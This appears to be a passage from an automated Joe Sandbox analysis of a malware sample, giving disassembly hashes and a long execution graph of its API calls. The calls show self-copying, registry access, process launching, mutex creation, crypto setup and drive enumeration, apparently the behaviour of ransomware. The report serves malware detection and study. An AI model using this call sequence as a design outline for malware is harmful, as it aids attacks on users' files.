                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                    • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                    • Instruction ID: 98435e26e9a2265e25363c3bf857d03c787615116b1e260b73bccfe5fc7a2c99
                                                                                                                                                    • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                    • Instruction Fuzzy Hash: C401483242824ABBCF125EC4DC01CEE3F67BF19355B488415FA6D58978D376C5B2AB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 022F7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 022F7A4B
                                                                                                                                                      • Part of subcall function 022F8140: ___BuildCatchObjectHelper.LIBCMT ref: 022F8172
                                                                                                                                                      • Part of subcall function 022F8140: ___AdjustPointer.LIBCMT ref: 022F8189
                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 022F7A62
                                                                                                                                                    • ___FrameUnwindToState.LIBCMT ref: 022F7A74
                                                                                                                                                    • CallCatchBlock.LIBCMT ref: 022F7A98
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2901542994-0
                                                                                                                                                    • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                    • Instruction ID: 6129c954fc954ace5770ca80c71ed9352d65e8c85fe393d98bf9a7fa764c6e83
                                                                                                                                                    • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                    • Instruction Fuzzy Hash: 6F012D32010209BBCF52AF95DC00EEABBBAFF48754F158024FE1865124C736E961DFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:6.9%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:15%
                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                    Total number of Limit Nodes:194
                                                                                                                                                    execution_graph 41538 40a290 41543 41cc50 41538->41543 41552 423b4c 41543->41552 41545 41cc5d 41548 40a299 41545->41548 41562 44f1bb 59 API calls 3 library calls 41545->41562 41549 4219ac 41548->41549 41638 4218b0 41549->41638 41551 40a2a8 41554 423b54 41552->41554 41555 423b6e 41554->41555 41557 423b72 std::exception::exception 41554->41557 41563 420c62 41554->41563 41580 42793d DecodePointer 41554->41580 41555->41545 41581 430eca RaiseException 41557->41581 41559 423b9c 41582 430d91 58 API calls _free 41559->41582 41561 423bae 41561->41545 41564 420cdd 41563->41564 41577 420c6e 41563->41577 41592 42793d DecodePointer 41564->41592 41566 420ce3 41568 425208 __fptostr 57 API calls 41566->41568 41567 420c79 41567->41577 41583 427f51 58 API calls 2 library calls 41567->41583 41584 427fae 58 API calls 8 library calls 41567->41584 41585 427b0b 41567->41585 41572 420cd5 41568->41572 41570 420ca1 RtlAllocateHeap 41570->41572 41570->41577 41572->41554 41573 420cc9 41589 425208 41573->41589 41577->41567 41577->41570 41577->41573 41578 420cc7 41577->41578 41588 42793d DecodePointer 41577->41588 41579 425208 __fptostr 57 API calls 41578->41579 41579->41572 41580->41554 41581->41559 41582->41561 41583->41567 41584->41567 41593 427ad7 GetModuleHandleExW 41585->41593 41588->41577 41597 42501f GetLastError 41589->41597 41591 42520d 41591->41578 41592->41566 41594 427af0 GetProcAddress 41593->41594 41595 427b07 ExitProcess 41593->41595 41594->41595 41596 427b02 41594->41596 41596->41595 41611 432534 41597->41611 41599 425034 41600 425082 SetLastError 41599->41600 41614 428c96 41599->41614 41600->41591 41604 42505b 41605 425061 41604->41605 41606 425079 41604->41606 41621 42508e 58 API calls 4 library calls 41605->41621 41622 420bed 41606->41622 41609 425069 GetCurrentThreadId 41609->41600 41610 42507f 41610->41600 41612 432547 41611->41612 41613 43254b TlsGetValue 41611->41613 41612->41599 41613->41599 41615 428c9d 41614->41615 41617 425047 41615->41617 41619 428cbb 41615->41619 41628 43b813 41615->41628 41617->41600 41620 432553 TlsSetValue 41617->41620 41619->41615 41619->41617 41636 4329c9 Sleep 41619->41636 41620->41604 41621->41609 41623 420c1f _rand_s 41622->41623 41624 420bf6 RtlFreeHeap 41622->41624 41623->41610 41624->41623 41625 420c0b 41624->41625 41626 425208 __fptostr 56 API calls 41625->41626 41627 420c11 GetLastError 41626->41627 41627->41623 41629 43b81e 41628->41629 41633 43b839 41628->41633 41630 43b82a 41629->41630 41629->41633 41631 425208 __fptostr 57 API calls 41630->41631 41634 43b82f 41631->41634 41632 43b849 HeapAlloc 41632->41633 41632->41634 41633->41632 41633->41634 41637 42793d DecodePointer 41633->41637 41634->41615 41636->41619 41637->41633 41639 4218bc _doexit 41638->41639 41646 427dfc 41639->41646 41645 4218e3 _doexit 41645->41551 41663 428af7 41646->41663 41648 4218c5 41649 4218f4 DecodePointer DecodePointer 41648->41649 41650 421921 41649->41650 41651 4218d1 41649->41651 41650->41651 41706 42a78d 59 API calls __fptostr 41650->41706 41660 4218ee 41651->41660 41653 421984 EncodePointer EncodePointer 41653->41651 41654 421933 41654->41653 41655 421958 41654->41655 41707 428d25 61 API calls 2 library calls 41654->41707 41655->41651 41658 421972 EncodePointer 41655->41658 41708 428d25 61 API calls 2 library calls 41655->41708 41658->41653 41659 42196c 41659->41651 41659->41658 41709 427e05 41660->41709 41664 428b1b EnterCriticalSection 41663->41664 41665 428b08 41663->41665 41664->41648 41670 428b9f 41665->41670 41667 428b0e 41667->41664 41694 427c2e 58 API calls 3 library calls 41667->41694 41671 428bab _doexit 41670->41671 41672 428bb4 41671->41672 41673 428bcc 41671->41673 41695 427f51 58 API calls 2 library calls 41672->41695 41682 428bed _doexit 41673->41682 41697 428cde 41673->41697 41675 428bb9 41696 427fae 58 API calls 8 library calls 41675->41696 41679 428bc0 41683 427b0b _doexit 3 API calls 41679->41683 41680 428bf7 41685 428af7 __lock 58 API calls 41680->41685 41681 428be8 41684 425208 __fptostr 58 API calls 41681->41684 41682->41667 41686 428bca 41683->41686 41684->41682 41687 428bfe 41685->41687 41686->41673 41688 428c23 41687->41688 41689 428c0b 41687->41689 41691 420bed _free 58 API calls 41688->41691 41703 43263e InitializeCriticalSectionAndSpinCount 41689->41703 41692 428c17 41691->41692 41704 428c3f LeaveCriticalSection _doexit 41692->41704 41695->41675 41696->41679 41699 428cec 41697->41699 41698 420c62 _malloc 58 API calls 41698->41699 41699->41698 41700 428be1 41699->41700 41702 428cff 41699->41702 41700->41680 41700->41681 41702->41699 41702->41700 41705 4329c9 Sleep 41702->41705 41703->41692 41704->41682 41705->41702 41706->41654 41707->41655 41708->41659 41712 428c81 LeaveCriticalSection 41709->41712 41711 4218f3 41711->41645 41712->41711 41713 41bae0 41714 41bba0 41713->41714 41715 41bb13 41713->41715 41716 41bf3d 41714->41716 41717 41bbad 41714->41717 41718 41bb15 41715->41718 41719 41bb54 41715->41719 41725 41bf65 IsWindow 41716->41725 41726 41bf9a DefWindowProcW 41716->41726 41721 41bbb0 DefWindowProcW 41717->41721 41722 41bbd7 41717->41722 41723 41bb47 PostQuitMessage 41718->41723 41724 41bb1c 41718->41724 41720 41bb70 41719->41720 41727 41bb75 DefWindowProcW 41719->41727 41728 420c62 _malloc 58 API calls 41722->41728 41723->41720 41724->41720 41724->41721 41729 41bb2e 41724->41729 41725->41720 41730 41bf73 DestroyWindow 41725->41730 41731 41bbe9 GetComputerNameW 41728->41731 41729->41720 41752 411cd0 41729->41752 41730->41720 41789 413100 41731->41789 41733 41bc26 41796 41ce80 59 API calls _memmove 41733->41796 41736 41bb3f 41736->41725 41737 41bc3a 41738 420bed _free 58 API calls 41737->41738 41750 41bcdc 41738->41750 41739 41befb IsWindow 41740 41bf11 41739->41740 41741 41bf28 41739->41741 41740->41741 41742 41bf1a DestroyWindow 41740->41742 41741->41720 41742->41741 41743 41bef7 41743->41739 41743->41741 41744 414690 59 API calls 41744->41750 41750->41739 41750->41743 41750->41744 41751 41be8f CreateThread 41750->41751 41797 40eff0 65 API calls 41750->41797 41798 41c330 41750->41798 41804 41c240 41750->41804 41810 41b8b0 41750->41810 41832 41ce80 59 API calls _memmove 41750->41832 41751->41750 41833 42f7c0 41752->41833 41755 411d20 _memset 41756 411d40 RegQueryValueExW RegCloseKey 41755->41756 41757 411d8f 41756->41757 41835 415c10 41757->41835 41759 411dbf 41760 411dd1 lstrlenA 41759->41760 41761 411e7c 41759->41761 41850 413520 41760->41850 41762 411e94 6 API calls 41761->41762 41763 411e89 41761->41763 41765 411ef5 UuidCreate UuidToStringW 41762->41765 41763->41762 41767 411f36 41765->41767 41766 411e3c PathFileExistsW 41766->41761 41768 411e52 41766->41768 41767->41767 41770 415c10 59 API calls 41767->41770 41772 411e6a 41768->41772 41853 414690 41768->41853 41769 411df1 41769->41766 41771 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 41770->41771 41774 411f98 41771->41774 41776 411fce 41771->41776 41772->41736 41775 415c10 59 API calls 41774->41775 41775->41776 41777 415c10 59 API calls 41776->41777 41778 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 41777->41778 41779 4121d1 41778->41779 41780 41207c _memset 41778->41780 41779->41772 41781 412095 6 API calls 41780->41781 41782 412115 _memset 41781->41782 41783 412109 41781->41783 41785 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 41782->41785 41876 413260 41783->41876 41786 4121b2 41785->41786 41787 4121aa GetLastError 41785->41787 41788 4121c0 WaitForSingleObject 41786->41788 41787->41779 41788->41779 41788->41788 41790 413121 41789->41790 41791 413133 41789->41791 41792 415c10 59 API calls 41790->41792 41794 415c10 59 API calls 41791->41794 41793 41312c 41792->41793 41793->41733 41795 413159 41794->41795 41795->41733 41796->41737 41797->41750 41903 41d3c0 41798->41903 41801 41c35b 41801->41750 41802 44f23e 59 API calls 41803 41c37a 41802->41803 41803->41750 41913 41d340 41804->41913 41807 41c26b 41807->41750 41808 44f23e 59 API calls 41809 41c28a 41808->41809 41809->41750 41811 41b8d6 41810->41811 41814 41b8e0 41810->41814 41812 414690 59 API calls 41811->41812 41812->41814 41813 41b916 41816 41b930 41813->41816 41818 414690 59 API calls 41813->41818 41814->41813 41815 414690 59 API calls 41814->41815 41815->41813 41817 41b94a 41816->41817 41819 414690 59 API calls 41816->41819 41820 41b964 41817->41820 41821 414690 59 API calls 41817->41821 41818->41816 41819->41817 41919 41bfd0 41820->41919 41821->41820 41823 41b976 41824 41bfd0 59 API calls 41823->41824 41825 41b988 41824->41825 41826 41bfd0 59 API calls 41825->41826 41827 41b99a 41826->41827 41828 41b9b4 41827->41828 41830 414690 59 API calls 41827->41830 41829 41b9f2 41828->41829 41931 413ff0 41828->41931 41829->41750 41830->41828 41832->41750 41834 411cf2 RegOpenKeyExW 41833->41834 41834->41755 41834->41772 41836 415c66 41835->41836 41841 415c1e 41835->41841 41837 415c76 41836->41837 41838 415cff 41836->41838 41847 415c88 ___crtGetEnvironmentStringsW 41837->41847 41883 416950 41837->41883 41892 44f23e 41838->41892 41841->41836 41845 415c45 41841->41845 41848 414690 59 API calls 41845->41848 41847->41759 41849 415c60 41848->41849 41849->41759 41851 414690 59 API calls 41850->41851 41852 413550 41851->41852 41852->41769 41854 4146a9 41853->41854 41855 41478c 41853->41855 41857 4146b6 41854->41857 41858 4146e9 41854->41858 41901 44f26c 59 API calls 3 library calls 41855->41901 41861 414796 41857->41861 41862 4146c2 41857->41862 41859 4147a0 41858->41859 41860 4146f5 41858->41860 41864 44f23e 59 API calls 41859->41864 41866 416950 59 API calls 41860->41866 41867 414707 ___crtGetEnvironmentStringsW 41860->41867 41902 44f26c 59 API calls 3 library calls 41861->41902 41900 413340 59 API calls _memmove 41862->41900 41865 4147aa 41864->41865 41868 4147bf 41865->41868 41873 4147cd 41865->41873 41866->41867 41867->41772 41870 415c10 59 API calls 41868->41870 41872 4147c8 41870->41872 41871 4146e0 41871->41772 41872->41772 41874 415c10 59 API calls 41873->41874 41875 4147ec 41874->41875 41875->41772 41877 41327d 41876->41877 41878 41326f 41876->41878 41881 415c10 59 API calls 41877->41881 41879 415c10 59 API calls 41878->41879 41880 413278 41879->41880 41880->41782 41882 41329c 41881->41882 41882->41782 41884 416986 41883->41884 41886 423b4c 59 API calls 41884->41886 41888 416a0d ___crtGetEnvironmentStringsW 41884->41888 41889 4169d3 41884->41889 41886->41889 41888->41847 41889->41888 41897 44f1bb 59 API calls 3 library calls 41889->41897 41898 430cfc 58 API calls std::exception::_Copy_str 41892->41898 41894 44f256 41899 430eca RaiseException 41894->41899 41896 44f26b 41898->41894 41899->41896 41900->41871 41901->41861 41902->41859 41906 41ccc0 41903->41906 41907 423b4c 59 API calls 41906->41907 41908 41ccca 41907->41908 41911 41c347 41908->41911 41912 44f1bb 59 API calls 3 library calls 41908->41912 41911->41801 41911->41802 41914 41cc50 59 API calls 41913->41914 41915 41d36c 41914->41915 41916 41c257 41915->41916 41918 41d740 59 API calls 41915->41918 41916->41807 41916->41808 41918->41916 41920 41c001 41919->41920 41921 41c00a 41919->41921 41920->41921 41922 41c083 41920->41922 41923 41c04c 41920->41923 41921->41823 41925 41c09e 41922->41925 41929 41c0e1 41922->41929 41958 41cf30 41923->41958 41926 41cf30 59 API calls 41925->41926 41928 41c0b2 41926->41928 41928->41921 41962 41d5b0 41928->41962 41966 41c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 41929->41966 41932 4140f2 41931->41932 41933 414009 41931->41933 41978 44f26c 59 API calls 3 library calls 41932->41978 41935 414016 41933->41935 41936 41405d 41933->41936 41937 4140fc 41935->41937 41938 414022 41935->41938 41939 414106 41936->41939 41940 414066 41936->41940 41979 44f26c 59 API calls 3 library calls 41937->41979 41942 414044 41938->41942 41943 41402b 41938->41943 41944 44f23e 59 API calls 41939->41944 41954 414078 ___crtGetEnvironmentStringsW 41940->41954 41969 416760 41940->41969 41968 412e80 59 API calls _memmove 41942->41968 41967 412e80 59 API calls _memmove 41943->41967 41946 414110 41944->41946 41950 41413a 41946->41950 41951 41412c 41946->41951 41949 41403b 41949->41829 41956 4156d0 59 API calls 41950->41956 41980 4156d0 41951->41980 41952 414054 41952->41829 41954->41829 41955 414135 41955->41829 41957 414151 41956->41957 41957->41829 41959 41cf5b 41958->41959 41960 41cf41 41958->41960 41959->41921 41960->41959 41961 414690 59 API calls 41960->41961 41961->41960 41963 41d5e2 41962->41963 41964 41d63e 41963->41964 41965 414690 59 API calls 41963->41965 41964->41921 41965->41963 41966->41928 41967->41949 41968->41952 41971 416793 41969->41971 41970 4167dc 41974 416817 ___crtGetEnvironmentStringsW 41970->41974 41999 44f1bb 59 API calls 3 library calls 41970->41999 41971->41970 41972 423b4c 59 API calls 41971->41972 41971->41974 41972->41970 41974->41954 41978->41937 41979->41939 41981 415735 41980->41981 41984 4156de 41980->41984 41982 4157bc 41981->41982 41983 41573e 41981->41983 41985 44f23e 59 API calls 41982->41985 41986 416760 59 API calls 41983->41986 41989 415750 ___crtGetEnvironmentStringsW 41983->41989 41984->41981 41991 415704 41984->41991 41987 4157c6 41985->41987 41986->41989 41988 4157db 41987->41988 42000 44f26c 59 API calls 3 library calls 41987->42000 41988->41955 41989->41955 41993 415709 41991->41993 41994 41571f 41991->41994 41992 415806 41995 413ff0 59 API calls 41993->41995 41996 413ff0 59 API calls 41994->41996 41997 415719 41995->41997 41998 41572f 41996->41998 41997->41955 41998->41955 42000->41992 42001 454c30 42003 420c62 58 API calls 42001->42003 42002 454c3a 42003->42002 42004 423f84 42005 423f90 _doexit 42004->42005 42041 432603 GetStartupInfoW 42005->42041 42008 423f95 42043 4278d5 GetProcessHeap 42008->42043 42009 423fed 42010 423ff8 42009->42010 42372 42411a 58 API calls 3 library calls 42009->42372 42044 425141 42010->42044 42013 423ffe 42014 424009 __RTC_Initialize 42013->42014 42373 42411a 58 API calls 3 library calls 42013->42373 42065 428754 42014->42065 42017 424018 42018 424024 GetCommandLineW 42017->42018 42374 42411a 58 API calls 3 library calls 42017->42374 42084 43235f GetEnvironmentStringsW 42018->42084 42021 424023 42021->42018 42024 42403e 42025 424049 42024->42025 42375 427c2e 58 API calls 3 library calls 42024->42375 42094 4321a1 42025->42094 42029 42405a 42108 427c68 42029->42108 42032 424062 42033 42406d __wwincmdln 42032->42033 42377 427c2e 58 API calls 3 library calls 42032->42377 42114 419f90 42033->42114 42036 424081 42037 424090 42036->42037 42369 427f3d 42036->42369 42378 427c59 58 API calls _doexit 42037->42378 42040 424095 _doexit 42042 432619 42041->42042 42042->42008 42043->42009 42379 427d6c 36 API calls 2 library calls 42044->42379 42046 425146 42380 428c48 InitializeCriticalSectionAndSpinCount ___lock_fhandle 42046->42380 42048 42514b 42049 42514f 42048->42049 42382 4324f7 TlsAlloc 42048->42382 42381 4251b7 61 API calls 2 library calls 42049->42381 42052 425154 42052->42013 42053 425161 42053->42049 42054 42516c 42053->42054 42055 428c96 __calloc_crt 58 API calls 42054->42055 42056 425179 42055->42056 42057 4251ae 42056->42057 42383 432553 TlsSetValue 42056->42383 42385 4251b7 61 API calls 2 library calls 42057->42385 42060 42518d 42060->42057 42062 425193 42060->42062 42061 4251b3 42061->42013 42384 42508e 58 API calls 4 library calls 42062->42384 42064 42519b GetCurrentThreadId 42064->42013 42066 428760 _doexit 42065->42066 42067 428af7 __lock 58 API calls 42066->42067 42068 428767 42067->42068 42069 428c96 __calloc_crt 58 API calls 42068->42069 42071 428778 42069->42071 42070 428783 _doexit @_EH4_CallFilterFunc@8 42070->42017 42071->42070 42072 4287e3 GetStartupInfoW 42071->42072 42078 4287f8 42072->42078 42079 428927 42072->42079 42073 4289ef 42388 4289ff LeaveCriticalSection _doexit 42073->42388 42075 428c96 __calloc_crt 58 API calls 42075->42078 42076 428974 GetStdHandle 42076->42079 42077 428987 GetFileType 42077->42079 42078->42075 42078->42079 42081 428846 42078->42081 42079->42073 42079->42076 42079->42077 42387 43263e InitializeCriticalSectionAndSpinCount 42079->42387 42080 42887a GetFileType 42080->42081 42081->42079 42081->42080 42386 43263e InitializeCriticalSectionAndSpinCount 42081->42386 42085 432370 42084->42085 42086 424034 42084->42086 42087 428cde __malloc_crt 58 API calls 42085->42087 42090 431f64 GetModuleFileNameW 42086->42090 42088 432396 ___crtGetEnvironmentStringsW 42087->42088 42089 4323ac FreeEnvironmentStringsW 42088->42089 42089->42086 42091 431f98 _wparse_cmdline 42090->42091 42092 428cde __malloc_crt 58 API calls 42091->42092 42093 431fd8 _wparse_cmdline 42091->42093 42092->42093 42093->42024 42095 4321ba _fputws 42094->42095 42099 42404f 42094->42099 42096 428c96 __calloc_crt 58 API calls 42095->42096 42104 4321e3 _fputws 42096->42104 42097 43223a 42098 420bed _free 58 API calls 42097->42098 42098->42099 42099->42029 42376 427c2e 58 API calls 3 library calls 42099->42376 42100 428c96 __calloc_crt 58 API calls 42100->42104 42101 43225f 42102 420bed _free 58 API calls 42101->42102 42102->42099 42104->42097 42104->42099 42104->42100 42104->42101 42105 432276 42104->42105 42389 42962f 58 API calls __fptostr 42104->42389 42390 4242fd 8 API calls 2 library calls 42105->42390 42107 432282 42109 427c74 __IsNonwritableInCurrentImage 42108->42109 42391 43aeb5 42109->42391 42111 427c92 __initterm_e 42112 4219ac __cinit 67 API calls 42111->42112 42113 427cb1 _doexit __IsNonwritableInCurrentImage 42111->42113 42112->42113 42113->42032 42115 419fa0 __ftell_nolock 42114->42115 42394 40cf10 42115->42394 42117 419fb0 42118 419fc4 GetCurrentProcess GetLastError SetPriorityClass 42117->42118 42119 419fb4 42117->42119 42120 419fe4 GetLastError 42118->42120 42121 419fe6 42118->42121 42767 4124e0 109 API calls _memset 42119->42767 42120->42121 42123 41d3c0 59 API calls 42121->42123 42125 41a00a 42123->42125 42124 419fb9 42124->42036 42126 41a022 42125->42126 42127 41b669 42125->42127 42131 41d340 59 API calls 42126->42131 42128 44f23e 59 API calls 42127->42128 42129 41b673 42128->42129 42130 44f23e 59 API calls 42129->42130 42132 41b67d 42130->42132 42133 41a04d 42131->42133 42133->42129 42134 41a065 42133->42134 42408 413a90 42134->42408 42138 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 42139 41a33d GlobalFree 42138->42139 42154 41a196 42138->42154 42140 41a354 42139->42140 42141 41a45c 42139->42141 42424 412220 42140->42424 42144 412220 76 API calls 42141->42144 42142 41a100 42142->42138 42146 41a359 42144->42146 42145 420235 60 API calls _TranslateName 42145->42154 42148 41a466 42146->42148 42439 40ef50 42146->42439 42147 41a1cc lstrcmpW lstrcmpW 42147->42154 42148->42036 42150 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 42150->42154 42151 41a48f 42153 41a4ef 42151->42153 42444 413ea0 42151->42444 42156 411cd0 92 API calls 42153->42156 42154->42139 42154->42145 42154->42147 42154->42150 42155 41a361 42154->42155 42768 423c92 59 API calls __woutput_p_l 42155->42768 42158 41a563 42156->42158 42161 414690 59 API calls 42158->42161 42192 41a5db 42158->42192 42159 41a36e lstrcpyW lstrcpyW 42160 41a395 OpenProcess 42159->42160 42162 41a402 42160->42162 42163 41a3a9 WaitForSingleObject CloseHandle 42160->42163 42165 41a5a9 42161->42165 42166 411cd0 92 API calls 42162->42166 42163->42162 42168 41a3cb 42163->42168 42164 41a6f9 42774 411a10 8 API calls 42164->42774 42170 414690 59 API calls 42165->42170 42171 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 42166->42171 42185 41a3e2 GlobalFree 42168->42185 42186 41a3d4 Sleep 42168->42186 42769 411ab0 PeekMessageW 42168->42769 42169 41a6fe 42172 41a8b6 CreateMutexA 42169->42172 42173 41a70f 42169->42173 42176 41a5d4 42170->42176 42177 41a451 42171->42177 42179 41a8ca 42172->42179 42178 41a7d0 42173->42178 42190 40ef50 58 API calls 42173->42190 42175 41a618 42175->42172 42180 41a624 GetVersion 42175->42180 42465 40d240 CoInitialize 42176->42465 42177->42036 42181 40ef50 58 API calls 42178->42181 42184 40ef50 58 API calls 42179->42184 42180->42164 42182 41a632 lstrcpyW lstrcatW lstrcatW 42180->42182 42187 41a7ec 42181->42187 42188 41a674 _memset 42182->42188 42195 41a8da 42184->42195 42189 41a3f7 42185->42189 42186->42160 42191 41a7f1 lstrlenA 42187->42191 42194 41a6b4 ShellExecuteExW 42188->42194 42189->42036 42198 41a72f 42190->42198 42193 420c62 _malloc 58 API calls 42191->42193 42192->42164 42192->42169 42192->42175 42196 41a810 _memset 42193->42196 42194->42169 42197 41a6e3 42194->42197 42199 413ea0 59 API calls 42195->42199 42210 41a92f 42195->42210 42201 41a81e MultiByteToWideChar lstrcatW 42196->42201 42212 41a9d1 42197->42212 42200 413ea0 59 API calls 42198->42200 42203 41a780 42198->42203 42199->42195 42200->42198 42201->42191 42202 41a847 lstrlenW 42201->42202 42204 41a8a0 CreateMutexA 42202->42204 42205 41a856 42202->42205 42206 41a79c CreateThread 42203->42206 42208 413ff0 59 API calls 42203->42208 42204->42179 42547 40e760 42205->42547 42206->42178 44132 41dbd0 42206->44132 42208->42206 42209 41a860 CreateThread WaitForSingleObject 42209->42204 44178 41e690 42209->44178 42211 415c10 59 API calls 42210->42211 42213 41a98c 42211->42213 42212->42036 42558 412840 42213->42558 42215 41a997 42563 410fc0 CryptAcquireContextW 42215->42563 42217 41a9ab 42218 41a9c2 lstrlenA 42217->42218 42218->42212 42220 41a9d8 42218->42220 42219 415c10 59 API calls 42221 41aa23 42219->42221 42220->42219 42222 412840 60 API calls 42221->42222 42223 41aa2e lstrcpyA 42222->42223 42226 41aa4b 42223->42226 42225 415c10 59 API calls 42227 41aa90 42225->42227 42226->42225 42228 40ef50 58 API calls 42227->42228 42229 41aaa0 42228->42229 42230 413ea0 59 API calls 42229->42230 42231 41aaf5 42229->42231 42230->42229 42232 413ff0 59 API calls 42231->42232 42233 41ab1d 42232->42233 42586 412900 42233->42586 42235 40ef50 58 API calls 42237 41abc5 42235->42237 42236 41ab28 _memmove 42236->42235 42238 413ea0 59 API calls 42237->42238 42239 41ac1e 42237->42239 42238->42237 42240 413ff0 59 API calls 42239->42240 42241 41ac46 42240->42241 42242 412900 60 API calls 42241->42242 42244 41ac51 _memmove 42242->42244 42243 40ef50 58 API calls 42245 41acee 42243->42245 42244->42243 42246 413ea0 59 API calls 42245->42246 42247 41ad43 42245->42247 42246->42245 42248 413ff0 59 API calls 42247->42248 42249 41ad6b 42248->42249 42250 412900 60 API calls 42249->42250 42253 41ad76 _memmove 42250->42253 42251 415c10 59 API calls 42252 41ae2a 42251->42252 42591 413580 42252->42591 42253->42251 42255 41ae3c 42256 415c10 59 API calls 42255->42256 42257 41ae76 42256->42257 42258 413580 59 API calls 42257->42258 42259 41ae82 42258->42259 42260 415c10 59 API calls 42259->42260 42261 41aebc 42260->42261 42262 413580 59 API calls 42261->42262 42263 41aec8 42262->42263 42264 415c10 59 API calls 42263->42264 42265 41af02 42264->42265 42266 413580 59 API calls 42265->42266 42267 41af0e 42266->42267 42268 415c10 59 API calls 42267->42268 42269 41af48 42268->42269 42270 413580 59 API calls 42269->42270 42271 41af54 42270->42271 42272 415c10 59 API calls 42271->42272 42273 41af8e 42272->42273 42274 413580 59 API calls 42273->42274 42275 41af9a 42274->42275 42276 415c10 59 API calls 42275->42276 42277 41afd4 42276->42277 42278 413580 59 API calls 42277->42278 42279 41afe0 42278->42279 42280 413100 59 API calls 42279->42280 42281 41b001 42280->42281 42282 413580 59 API calls 42281->42282 42283 41b025 42282->42283 42284 413100 59 API calls 42283->42284 42285 41b03c 42284->42285 42286 413580 59 API calls 42285->42286 42287 41b059 42286->42287 42288 413100 59 API calls 42287->42288 42289 41b070 42288->42289 42290 413580 59 API calls 42289->42290 42291 41b07c 42290->42291 42292 413100 59 API calls 42291->42292 42293 41b093 42292->42293 42294 413580 59 API calls 42293->42294 42295 41b09f 42294->42295 42296 413100 59 API calls 42295->42296 42297 41b0b6 42296->42297 42298 413580 59 API calls 42297->42298 42299 41b0c2 42298->42299 42300 413100 59 API calls 42299->42300 42301 41b0d9 42300->42301 42302 413580 59 API calls 42301->42302 42303 41b0e5 42302->42303 42304 413100 59 API calls 42303->42304 42305 41b0fc 42304->42305 42306 413580 59 API calls 42305->42306 42307 41b108 42306->42307 42309 41b130 42307->42309 42775 41cdd0 59 API calls 42307->42775 42310 40ef50 58 API calls 42309->42310 42311 41b16e 42310->42311 42313 41b1a5 GetUserNameW 42311->42313 42598 412de0 42311->42598 42314 41b1c9 42313->42314 42605 412c40 42314->42605 42316 41b1d8 42612 412bf0 42316->42612 42320 41b2f5 42623 4136c0 42320->42623 42324 41b311 42639 4130b0 42324->42639 42326 412c40 59 API calls 42341 41b1f3 42326->42341 42329 412900 60 API calls 42329->42341 42330 41b327 42666 4111c0 CreateFileW 42330->42666 42331 413580 59 API calls 42331->42341 42333 41b33b 42751 41ba10 LoadCursorW RegisterClassExW 42333->42751 42335 413100 59 API calls 42335->42341 42336 41b343 42752 41ba80 CreateWindowExW 42336->42752 42338 41b34b 42338->42212 42755 410a50 GetLogicalDrives 42338->42755 42341->42320 42341->42326 42341->42329 42341->42331 42341->42335 42776 40f1f0 59 API calls 42341->42776 42342 41b379 42343 413100 59 API calls 42342->42343 42344 41b3a5 42343->42344 42345 413580 59 API calls 42344->42345 42368 41b3b3 42345->42368 42346 41b48b 42766 41fdc0 CreateThread 42346->42766 42348 41b49f GetMessageW 42349 41b4ed 42348->42349 42350 41b4bf 42348->42350 42353 41b502 PostThreadMessageW 42349->42353 42354 41b55b 42349->42354 42351 41b4c5 TranslateMessage DispatchMessageW KiUserCallbackDispatcher 42350->42351 42351->42349 42351->42351 42352 41c330 59 API calls 42352->42368 42355 41b510 PeekMessageW 42353->42355 42356 41b564 PostThreadMessageW 42354->42356 42357 41b5bb 42354->42357 42359 41b546 WaitForSingleObject 42355->42359 42360 41b526 DispatchMessageW PeekMessageW 42355->42360 42358 41b570 PeekMessageW 42356->42358 42357->42212 42363 41b5d2 CloseHandle 42357->42363 42361 41b5a6 WaitForSingleObject 42358->42361 42362 41b586 DispatchMessageW PeekMessageW 42358->42362 42359->42354 42359->42355 42360->42359 42360->42360 42361->42357 42361->42358 42362->42361 42362->42362 42363->42212 42364 41c240 59 API calls 42364->42368 42365 41b8b0 59 API calls 42365->42368 42366 413260 59 API calls 42366->42368 42368->42346 42368->42352 42368->42364 42368->42365 42368->42366 42765 41fa10 CreateThread 42368->42765 44381 427e0e 42369->44381 42371 427f4c 42371->42037 42372->42010 